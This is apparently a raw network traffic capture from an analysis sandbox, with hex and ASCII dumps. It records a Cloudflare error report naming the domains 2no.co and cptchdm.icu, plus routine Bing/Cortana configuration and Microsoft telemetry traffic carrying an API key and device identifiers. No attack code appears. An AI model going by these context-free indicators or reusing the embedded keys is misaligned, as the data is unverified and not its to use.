2025-10-17 06:52:36 UTC	477	OUT	POST /report/v4?s=A7t3Og%2Bw6gkykw5ZQlhrCwiQ%2BawvADu0Yr9ZAKkZt9xXRpOjS3EmhsUIl8Q1dP5B3o8xdMdxKR5WQyTIhAXsRu7gViQyImXI0H9GmIq1P%2Fx1fvH%2B9dnsano%3D HTTP/1.1 host: a.nel.cloudflare.com content-length: 400 content-type: application/reports+json origin: https://2no.co user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=4, i
2025-10-17 06:52:36 UTC	400	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 35 36 38 32 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 38 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 32 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 63 70 74 63 68 64 6d 2e 69 63 75 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 39 2e 37 36 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a Data Ascii: [{"age":56823,"body":{"elapsed_time":285,"method":"GET","phase":"application","protocol":"h2","referrer":"https://cptchdm.icu/","sampling_fraction":1.0,"server_ip":"172.67.149.76","status_code":403,"type":"http.error"},"type":"network-error","url":"https:
2025-10-17 06:52:36 UTC	195	IN	HTTP/1.1 200 OK content-length: 0 access-control-allow-origin: * vary: Origin date: Fri, 17 Oct 2025 06:52:36 GMT via: 1.1 google alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:52:50 UTC	430	OUT	GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1 host: fp.msedge.net origin: https://www.bing.com referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept: / accept-language: en-CH accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
2025-10-17 06:52:50 UTC	408	IN	HTTP/1.1 200 OK cache-control: public,max-age=900 content-length: 18310 content-type: application/json; charset=utf-8 etag: "1901077784" access-control-allow-origin: * request-context: appId=cid-v1:b183296d-485b-49fc-81c7-a511e61d1309 x-cache: CONFIG_NOCACHE x-msedge-ref: Ref A: 72F4D9623F1B4A6E9041F570C7922030 Ref B: ZRHEDGE1412 Ref C: 2025-10-17T06:52:50Z date: Fri, 17 Oct 2025 06:52:49 GMT
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 7b 22 73 22 3a 35 30 30 30 2c 22 6e 22 3a 33 2c 22 65 22 3a 5b 7b 22 65 22 3a 22 2a 2e 61 7a 72 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 35 30 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 61 66 64 78 74 65 73 74 2e 7a 30 31 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 35 30 30 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 61 6d 73 30 36 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 Data Ascii: {"s":5000,"n":3,"e":[{"e":".azr.footprintdns.com","w":5000,"m":128},{"e":".clo.footprintdns.com","w":2000,"m":1},{"e":"*.clo.footprintdns.com","w":100,"m":128},{"e":"afdxtest.z01.azurefd.net","w":500,"m":1},{"e":"ams06prdapp02-canary.netmon.azure.com","
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 33 2c 22 65 78 22 3a 22 30 64 37 62 65 30 39 33 30 37 35 65 34 33 34 31 39 64 33 31 38 66 31 39 61 35 37 65 61 61 66 37 22 7d 2c 7b 22 65 22 3a 22 62 2d 72 69 6e 67 2d 66 61 6c 6c 62 61 63 6b 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 62 78 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 62 78 2d 72 69 6e 67 2d 66 61 6c 6c 62 61 63 6b 2e 6d 73 65 64 67 65 2e Data Ascii: rdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"b-ring.msedge.net","w":2000,"m":3,"ex":"0d7be093075e43419d318f19a57eaaf7"},{"e":"b-ring-fallback.msedge.net","w":50,"m":3},{"e":"bx-ring.msedge.net","w":2000,"m":3},{"e":"bx-ring-fallback.msedge.
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 33 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 70 71 32 34 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 70 71 32 34 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 70 71 32 35 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b Data Ascii: 3prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"cpq24prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"cpq24prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"cpq25prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 31 32 38 7d 2c 7b 22 65 22 3a 22 64 73 6d 30 39 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 64 73 7a 30 34 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 64 73 7a 30 38 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 64 75 61 6c 2d 73 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 64 75 61 6c 2d 73 Data Ascii: 128},{"e":"dsm09prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"dsz04prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"dsz08prdapp02-canary.netmon.azure.com","w":3,"m":128},{"e":"dual-s-ring.msedge.net","w":2000,"m":3},{"e":"dual-s
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 22 66 62 2d 75 6e 69 63 61 73 74 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 66 70 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 66 70 2d 61 66 64 2e 61 7a 75 72 65 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 37 30 30 2c 22 6d 22 3a 33 2c 22 65 78 22 3a 22 32 32 64 34 39 66 37 62 32 34 38 32 34 65 39 38 62 64 36 39 30 65 62 66 66 64 36 35 32 31 66 61 22 7d 2c 7b 22 65 22 3a 22 66 70 2d 61 66 64 2e 61 7a 75 72 65 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 38 7d 2c 7b 22 65 22 3a 22 66 70 2d 61 66 64 2e 61 7a 75 72 65 65 64 67 65 2e 75 73 22 2c 22 77 22 3a 35 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 66 70 2d 61 66 64 2e 61 Data Ascii: "fb-unicast.msedge.net","w":500,"m":3},{"e":"fp.msedge.net","w":50,"m":3},{"e":"fp-afd.azureedge.net","w":700,"m":3,"ex":"22d49f7b24824e98bd690ebffd6521fa"},{"e":"fp-afd.azureedge.net","w":50,"m":8},{"e":"fp-afd.azureedge.us","w":500,"m":3},{"e":"fp-afd.a
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 68 6b 67 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 68 6b 67 32 32 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 68 6b 67 32 33 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 68 6b 67 32 33 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e Data Ascii: ","w":3,"m":128},{"e":"hkg20prdapp02-canary.netmon.azure.com","w":3,"m":128},{"e":"hkg22prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"hkg23prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"hkg23prdapp02-canary-opaph.netmon.azure.
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 7b 22 65 22 3a 22 6c 6e 2d 72 69 6e 67 2d 66 61 6c 6c 62 61 63 6b 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 6c 6f 6e 32 32 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6c 6f 6e 32 32 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6c 6f 6e 32 33 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6c 6f Data Ascii: {"e":"ln-ring-fallback.msedge.net","w":50,"m":3},{"e":"lon22prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"lon22prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"lon23prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"lo
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 6f 72 69 67 69 6e 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 6d 72 2d 75 6e 69 63 61 73 74 2e 61 7a 75 72 65 66 64 2d 74 65 73 74 2e 6e 65 74 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 6d 77 68 30 31 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 31 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6d 77 68 30 33 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6d 77 68 30 34 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 Data Ascii: origin.clo.footprintdns.com","w":50,"m":3},{"e":"mr-unicast.azurefd-test.net","w":100,"m":3},{"e":"mwh01prdapp02-canary.netmon.azure.com","w":1,"m":128},{"e":"mwh03prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"mwh04prdapp01-canary-opaph.net
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6f 77 31 2e 72 65 73 2e 6f 66 66 69 63 65 33 36 35 2e 63 6f 6d 22 2c 22 77 22 3a 37 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 6f 77 31 2e 72 65 73 2e 6f 66 66 69 63 65 33 36 35 2e 63 6f 6d 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 38 7d 2c 7b 22 65 22 3a 22 70 61 72 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 70 61 72 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 70 61 72 32 31 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 Data Ascii: ":128},{"e":"ow1.res.office365.com","w":700,"m":3},{"e":"ow1.res.office365.com","w":50,"m":8},{"e":"par20prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"par20prdapp02-canary.netmon.azure.com","w":3,"m":128},{"e":"par21prdapp01-canary.netmon.azure.c
2025-10-17 06:52:50 UTC	1460	IN	Data Raw: 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 72 69 6f 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 72 6f 78 79 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 72 75 6d 31 34 2e 70 65 72 66 2e 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 22 2c 22 77 22 3a 31 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 72 75 6d 31 38 2e 70 65 72 66 2e 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 22 2c 22 77 22 3a 31 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 72 75 6d 38 2e 70 65 72 66 2e 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 22 2c 22 77 22 3a 32 31 35 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 Data Ascii: m":128},{"e":"rio20prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"roxy.azurefd.net","w":50,"m":3},{"e":"rum14.perf.linkedin.com","w":150,"m":3},{"e":"rum18.perf.linkedin.com","w":150,"m":3},{"e":"rum8.perf.linkedin.com","w":215,"m":3},{"e":"

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:52:50 UTC	652	OUT	POST /Collector/3.0/?qsp=true&content-type=application%2Fbond-compact-binary&client-id=NO_AUTH&sdk-version=AWT-Web-CJS-1.2.0&x-apikey=33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176 HTTP/1.1 host: browser.pipe.aria.microsoft.com origin: https://www.bing.com referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept: / accept-language: en-CH accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 content-length: 961 cache-control: no-cache
2025-10-17 06:52:50 UTC	961	OUT	Data Raw: 6d 09 0b 01 4a 33 33 64 37 30 61 38 36 34 35 39 39 34 39 36 62 39 38 32 61 33 39 66 30 33 36 66 37 31 31 32 32 2d 32 30 36 34 37 30 33 65 2d 33 61 39 64 2d 34 64 39 30 2d 38 33 36 32 2d 65 65 63 30 38 64 66 66 65 38 65 38 2d 37 31 37 36 0a 01 49 12 61 63 74 5f 64 65 66 61 75 6c 74 5f 73 6f 75 72 63 65 a9 24 32 66 65 37 39 36 63 30 2d 35 34 38 37 2d 34 61 66 63 2d 39 66 37 35 2d 65 64 34 30 61 64 37 62 31 62 31 61 d1 06 8c a7 8a 8f be 66 cb 08 0a 01 29 24 64 39 30 64 61 34 35 66 2d 30 66 32 39 2d 34 65 37 39 2d 62 38 35 39 2d 61 61 63 66 32 65 38 32 62 30 64 61 71 96 97 8a 8f be 66 a9 14 63 75 73 74 6f 6d 2e 43 6c 69 65 6e 74 5f 45 76 65 6e 74 73 c9 06 0e 76 61 72 69 61 6e 74 5f 65 76 65 6e 74 73 cd 0d 09 09 19 0a 64 65 76 69 63 65 54 79 70 65 07 44 45 53 Data Ascii: mJ33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176Iact_default_source$2fe796c0-5487-4afc-9f75-ed40ad7b1b1af)$d90da45f-0f29-4e79-b859-aacf2e82b0daqfcustom.Client_Eventsvariant_eventsdeviceTypeDES
2025-10-17 06:52:50 UTC	443	IN	HTTP/1.1 200 OK content-length: 0 content-type: application/json server: Microsoft-HTTPAPI/2.0 strict-transport-security: max-age=31536000 time-delta-millis: 1515 access-control-allow-origin: * access-control-allow-methods: POST access-control-allow-headers: Accept, Content-Type, Content-Encoding, Client-Id access-control-expose-headers: kill-tokens, kill-duration-seconds, time-delta-millis date: Fri, 17 Oct 2025 06:52:49 GMT